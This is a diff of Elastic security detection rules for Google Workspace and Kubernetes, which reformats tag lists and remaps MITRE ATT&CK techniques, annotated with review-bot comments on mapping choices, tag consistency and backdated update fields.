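Review bot: In hunk `@@ -87,7 +87,13 @@` the new `tags` list places `"Resources: Investigation Guide"` before `"Tactic: Persistence"`, whereas the application_added, admin_role_assigned_to_user and password_policy_modified hunks put the Tactic tags before Resources; role_modified matches this file's order. Picking one order (Domain, Data Source, Use Case, Tactic, Resources appears to be the majority) keeps the tag lists consistent across the reformatted files. The forbidden_creation_request hunk also drops the trailing comma after `"Resources: Investigation Guide"` and indents the closing `]`, which differs from every other multi-line `tags` block in this diff.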
--- a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -85,7 +85,13 @@ references = [ risk_score = 47 rule_id = "a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -105,13 +111,14 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml index b71a1ab8f60..040e19fdd98 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml 
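Review bot: Hunk `@@ -105,13 +111,14 @@` replaces T1484 (Domain or Tenant Policy Modification) with T1098 (Account Manipulation) for a rule whose description concerns a tenant-wide password policy change rather than a change to a particular account, and nothing in the diff records why. If the swap is driven by wanting a technique that ATT&CK lists under Persistence, that reasoning belongs in the PR description or the rule's `note`; otherwise T1484 looks like the closer description of the observed action. Please also double-check that the rule's `description` and investigation guide still agree with the new mapping, since they are outside the hunk.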
@@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -89,7 +89,13 @@ references = [ risk_score = 47 rule_id = "6f435062-b7fc-4af9-acea-5b1ead65c5a5" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "query" @@ -100,36 +106,14 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml index 257ab1403ac..cb0bc8fec70 100644 
--- a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/06" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -88,7 +88,13 @@ references = [ risk_score = 21 rule_id = "cc6a8a20-2df2-11ed-8378-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -100,36 +106,19 @@ event.dataset:"google_workspace.admin" and event.type:change and event.category: [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml index 13b9f2a5eef..8bc3d051239 100644 --- a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml +++ b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -83,7 +83,13 @@ references = [ risk_score = 47 rule_id = "e555105c-ba6d-481f-82bb-9b633e7b4827" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
@@ -94,36 +100,14 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml index e4be94a152b..0a6f1a1293f 100644 --- a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml +++ b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] 
@@ -70,7 +70,15 @@ references = [ risk_score = 47 rule_id = "220d92c6-479d-4a49-9cc0-3a29756dad0c" severity = "medium" -tags = ["Tactic: Credential Access", "Tactic: Impact", "Data Source: Kubernetes", "Domain: Kubernetes", "Domain: Cloud", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -103,36 +111,31 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/kubernetes/defense_evasion_events_deleted.toml b/rules/integrations/kubernetes/defense_evasion_events_deleted.toml index cf03e321426..106c1158e52 100644 --- a/rules/integrations/kubernetes/defense_evasion_events_deleted.toml 
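Review bot: Hunk `@@ -103,36 +111,31 @@` maps the second threat entry to T1530 (Data from Cloud Storage) under Collection, but the rule reads Kubernetes Secret/ConfigMap objects through the API server, which the first entry already captures as T1552.007 (Container API); object-storage collection seems a loose fit for that activity. If a Collection mapping is wanted, it would help to state in the PR why T1530 was chosen, or else drop the second entry and the matching `"Tactic: Collection"` tag added in hunk `@@ -70,7 +70,15 @@`. The `updated_date` hunk for this file also sets the date to `"2026/03/10"`, the creation date, despite the mapping change.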
+++ b/rules/integrations/kubernetes/defense_evasion_events_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/27" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/19" [rule] author = ["Elastic"] @@ -74,6 +74,11 @@ id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml index 6226a49b4c1..7e2e716541f 100644 --- a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml +++ b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -69,7 +69,13 @@ references = [ risk_score = 21 rule_id = "63c056a0-339a-11ed-a261-0242ac120002" severity = "low" -tags = ["Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
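Review bot: Hunk `@@ -74,6 +74,11 @@` adds the T1070.004 (File Deletion) subtechnique to a rule that, judging by its filename, detects deletion of Kubernetes Event objects via the API, which are API resources rather than files on disk. The parent T1070 (Indicator Removal) already covers the behaviour; if a subtechnique is desired, the choice should be justified in the PR or the addition dropped. The enclosing threat entry starts above the hunk, so confirm no other subtechnique table is already present there.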
@@ -82,24 +88,6 @@ user_agent.original:(* and not (*kubernetes/$Format or karpenter or csi-secrets- [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -109,6 +97,7 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml index 5b03ba10457..359940c58b7 100644 --- a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml +++ b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml @@ -2,7 +2,7 @@ creation_date = "2022/06/30" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] @@ -91,11 +91,6 @@ kubernetes.audit.objectRef.resource:("selfsubjectaccessreviews" or "selfsubjectr [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" 
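Review bot: Hunk `@@ -91,11 +91,6 @@` removes T1069 (Permission Groups Discovery) while the hunk context shows the query targets `selfsubjectaccessreviews`/`selfsubjectrulesreviews`, which are requests by a principal to enumerate its own permissions; that is the permission-discovery behaviour T1069 describes, and T1613 (Container and Resource Discovery) alone no longer captures it. Consider keeping the T1069 technique table alongside T1613, or note the reason for removing it in the PR. Multiple `[[rule.threat.technique]]` tables under one tactic entry remain valid, as the azure_arc hunk shows.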
@@ -105,6 +100,7 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml index f670851fa90..25df5e78816 100644 --- a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml +++ b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -40,11 +40,6 @@ kubernetes.audit.objectRef.resource == "pods" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml index c3976832488..19a1619b8ab 100644 --- a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml +++ b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/19" [rule] author = ["Elastic"] 
@@ -57,7 +57,13 @@ Kubernetes, a container orchestration platform, manages applications across clus risk_score = 47 rule_id = "ec81962e-4bc8-48e6-bfb0-545fc97d8f6a" severity = "medium" -tags = ["Tactic: Privilege Escalation", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide" + ] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -68,12 +74,7 @@ kubernetes.audit.stage == "ResponseComplete" and `kubernetes.audit.annotations.a [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml index b99c04c5b26..b6fa7170cb4 100644 --- a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml +++ b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] 
@@ -55,7 +55,13 @@ Kubernetes, a container orchestration platform, manages applications across clus risk_score = 47 rule_id = "4b77d382-b78e-4aae-85a0-8841b80e4fc4" severity = "medium" -tags = ["Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -68,15 +74,11 @@ user_agent.original:(* and not (*kubernetes/$Format)) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml index 9c6166c4479..1dcd69850d3 100644 --- a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml +++ b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] 
@@ -56,7 +56,14 @@ Kubernetes orchestrates containerized applications, relying on API requests for risk_score = 21 rule_id = "8a1db198-da6f-4500-b985-7fe2457300af" severity = "low" -tags = ["Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Domain: Container", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Domain: Container", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -72,15 +79,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["kubernetes.audit.annotations.authorization_k8s_io/decision", "kubernetes.audit.user.username", "user_agent.original"] diff --git a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml index c7d081ec603..a850dfd2023 100644 --- a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml +++ b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/03" [rule] author = ["Elastic"] 
@@ -67,7 +67,14 @@ references = [ risk_score = 47 rule_id = "63c057cc-339a-11ed-a261-0242ac120002" severity = "medium" -tags = ["Tactic: Initial Access", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Kubernetes", + "Domain: Kubernetes", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -95,6 +102,7 @@ reference = "https://attack.mitre.org/techniques/T1078/001/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml index 803bf630a6a..229f671329b 100644 --- a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml +++ b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/18" [rule] author = ["Elastic"] @@ -76,7 +76,7 @@ references = [ risk_score = 47 rule_id = "65f9bccd-510b-40df-8263-334f03174fed" severity = "medium" -tags = ["Tactic: Initial Access", "Tactic: Persistence", "Data Source: Kubernetes", "Resources: Investigation Guide"] +tags = ["Data Source: Kubernetes", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
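Review bot: Hunk `@@ -67,7 +67,14 @@` adds `"Tactic: Defense Evasion"` to `tags`, but the only tactic visible in this file's threat section (hunk `@@ -95,6 +102,7 @@`) is Initial Access, so unless a Defense Evasion `[[rule.threat]]` entry exists above line 95 outside the hunk the new tag has no matching mapping. The nodeport file has the same problem in the other direction: hunk `@@ -76,7 +76,7 @@` adds `"Tactic: Execution"` while hunk `@@ -91,26 +91,14 @@` leaves only the Persistence entry. A tag/tactic consistency check would presumably flag both; either add the corresponding threat entry or drop the tag.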
@@ -91,26 +91,14 @@ event.dataset : "kubernetes.audit_logs" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1133" name = "External Remote Services" reference = "https://attack.mitre.org/techniques/T1133/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml index 83338845d36..ec7881b3507 100644 --- a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml +++ b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/20" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] 
@@ -85,24 +85,24 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml index b64d6a1d21f..de40e62409d 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostipc.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] 
@@ -96,24 +96,24 @@ not kubernetes.audit.requestObject.spec.containers.image: ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml index 0161fff49b9..15f42caaf18 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] 
@@ -101,24 +101,24 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml index 96772301c11..eebe0cdc29e 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] 
